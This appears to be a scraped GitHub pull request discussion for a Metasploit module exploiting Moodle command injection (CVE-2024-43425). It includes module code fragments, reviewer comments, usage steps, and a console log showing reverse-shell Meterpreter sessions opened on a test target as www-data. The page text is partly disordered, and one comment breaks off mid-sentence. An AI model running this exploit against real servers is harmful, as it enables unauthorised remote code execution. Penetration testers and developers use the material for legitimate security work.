Moodle RCE (CVE-2024-43425) Module #19430
placeholder for CVE-2024-43425
end
print_good('Server reachable.')

moodlesession = res.get_cookies.scan(/MoodleSession=([^;]+)/).flatten[0]
Would you be able to use 'keep_cookies' => true instead of manually extracting moodlesession?
In this case I had issues getting it to work with keep_cookies, as sometimes an expected cookie was not present in the order the requests are being sent to the server, if I remember correctly.
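The difference the two comments above are discussing, as an added illustration that is not code from the PR or from Metasploit: a one-shot regex scan only sees the cookies of the response it is run on, whereas a jar that folds every response together always carries the most recent MoodleSession. The sample responses are constructed; the session-cookie rotation in the second one is an assumption used to model a post-login reissue.

```ruby
# Added example, not code from the PR: a minimal cookie jar that does what
# 'keep_cookies' => true relies on, beside the single-response regex scan
# from the diff, to show why the scan can come up empty on some responses.

# Split a "name=value; name2=value2" cookie string into a hash.
# Set-Cookie attributes (path, HttpOnly, ...) are skipped so they never
# masquerade as cookie names.
def parse_cookie_string(str)
  attrs = %w[path domain expires max-age samesite secure httponly]
  str.to_s.split(/;\s*/).each_with_object({}) do |pair, jar|
    name, value = pair.split('=', 2)
    next if name.nil? || value.nil? || name.strip.empty?
    next if attrs.include?(name.strip.downcase)
    jar[name.strip] = value.strip
  end
end

# The one-shot approach from the diff: look only at the current response.
# Returns nil when that particular response carries no MoodleSession.
def extract_once(cookie_str)
  cookie_str.to_s.scan(/MoodleSession=([^;]+)/).flatten[0]
end

# Jar approach: fold every response's cookies into one hash; a later value
# for the same name replaces the earlier one.
def jar_after(responses)
  responses.reduce({}) { |jar, str| jar.merge(parse_cookie_string(str)) }
end

# Render the jar as a Cookie request header for the next request.
def cookie_header(jar)
  jar.map { |name, value| "#{name}=#{value}" }.join('; ')
end

# Constructed sample: three consecutive responses. The first sets the session
# cookie, the second reissues it under a new value (assumed here to model a
# post-login rotation), the third sets no cookie at all.
SAMPLE_RESPONSES = [
  'MoodleSession=aaa111; path=/; HttpOnly',
  'MoodleSession=bbb222; path=/; HttpOnly',
  ''
].freeze

if __FILE__ == $PROGRAM_NAME
  puts "one-shot on last response: #{extract_once(SAMPLE_RESPONSES.last).inspect}"
  puts "jar after all responses:   #{cookie_header(jar_after(SAMPLE_RESPONSES))}"
end
```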
'mform_isexpanded_id_multitriesheader' => '0',
'mform_isexpanded_id_tagsheader' => '0',
'category' => "#{category},#{course_context_id}",
'name' => 'XXXXXXXXXXXXXXXX',
Could this, and maybe some of the other values being sent here, be randomized?
Yes, I used hardcoded values to get an initial PoC working. I'll see which ones I can randomize and update the code accordingly.
Hello teacher, I found that the 6.4.26 version of msfconsole does not integrate this vulnerability library; where can I get this vulnerability library?
@ABC20236 It hasn't been merged yet. If you'd like to use it already, you can add it yourself by copying the files from this PR (located at https://github.com/rapid7/metasploit-framework/pull/19430/files). The module is still a draft, but should work. @jheysel-r7 Thank you for your feedback! Hopefully I have more time in the coming days to work through your comments (as well as for the other pending PRs) and update the module(s) accordingly.
Teacher, thank you so much for your help. I used the file you provided to test locally, but I encountered the following problem; due to limited ability, I hope to get your help.
Thank you for reporting the bug. Can you please enter As this module is still a draft, it has a couple of issues with handling error cases, missing code optimizations, etc.
Awesome, let us know if you need any help getting it over the line for landing 🎉
@adfoster-r7 Thank you, I appreciate it. I'll try to provide an update this week.
Finally pushed some (minor) updates.
@adfoster-r7 If you or someone else from your team has some cycles to help get this merged, that would be great. I probably won't have much time left this year to work on modules.
Hello @h4x-x0r, so the exploit is working fine and I think the module is well written. I noticed a couple of things I would like to address with you: running
If we run
Thank you for testing and reviewing the module, @dledda-r7! If you do find out how to better catch the incoming meterpreter session, please do let me know, as I encountered the same issue in a couple of other modules I've been working on.
Regarding the first issue, I am gonna try to add a timeout in the request that hangs to see if we can get the session without displaying the "no session created". Regarding the second issue, I wouldn't really bother myself... looks like the command is executed two times from the Moodle side and I don't think it is a blocker; two sessions are better than zero 😂
The module looks good! Thanks @h4x-x0r!
msf6 exploit(linux/http/moodle_rce) > exploit
[*] Started reverse TCP handler on 172.30.50.186:4444
[*] Obtaining MoodleSession and logintoken...
[+] Server reachable.
[*] Authenticating as super-teacher...
[*] Successfully authenticated.
[*] Obtaining sesskey, courseContextId, and category...
[*] Injecting command...
[*] Sending stage (3045380 bytes) to 172.30.56.159
[*] Meterpreter session 6 opened (172.30.50.186:4444 -> 172.30.56.159:42412) at 2024-12-05 04:29:47 -0500
[*] Sending stage (3045380 bytes) to 172.30.56.159
[*] Meterpreter session 7 opened (172.30.50.186:4444 -> 172.30.56.159:42426) at 2024-12-05 04:29:47 -0500
meterpreter > sysinfo
Computer : 172.30.56.159
OS : Ubuntu 24.04 (Linux 6.8.0-49-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter >
Release Notes
This adds an exploit module for the Moodle learning platform. The module exploits a command injection vulnerability in Moodle (CVE-2024-43425) to obtain remote code execution. By default, the application will run in the context of www-data, so only a limited shell can be obtained.
Awesome, thank you!
This is a new module which exploits a command injection vulnerability in Moodle (CVE-2024-43425) to obtain remote code execution. By default, the application will run in the context of www-data, so only a limited shell can be obtained.
Valid credentials are required to exploit this vulnerability. Moreover, the user must be authorized to either add a new or modify an existing quiz, in order to reach the vulnerable function and trigger the bug. User roles that fall into this category include Teacher and Administrator, but might differ depending on the specific deployment and configuration.
Verification Steps
… Teacher) and assign it to the previously created course.
… <IP>/moodle/course/view.php?id=3).
… <IP>/moodle/mod/quiz/edit.php?cmid=4).
… msfconsole
use exploit/linux/http/moodle_rce
set USERNAME <USER>
set PASSWORD <PASSWORD>
set CMID <ID>
set COURSEID <ID>
set RHOSTS <IP>
set LHOST <IP>
exploit
Notes
Obtaining the course ID and course module ID has to be done manually by the user running the module. While it could be automated, there are too many variables to consider (multiple courses, multiple quizzes, specific configurations of these, specific permissions assigned to the given user, etc.). Since it is fairly trivial to obtain these from the address bar while browsing Moodle, it shouldn't be a big burden for the user.
I played around with different timeouts and similar properties, but the current draft of the module always results in a shell that isn't directly caught when the module is executed:
While it's not a big issue to manually select the session, it would be nicer if it gets caught while running the module. Is there a specific MSF directive or property I can add to make this more reliable in my module?
Currently no check method is implemented, as I didn't see an endpoint that returns the version details to an unauthenticated user.
I'm leaving it as a draft for now, as I still want to do some cleanup and improvements, as well as incorporate some of the feedback that I got in other PRs that apply here too. However, the current code should work in the majority of cases as is, in case someone would like to test it already.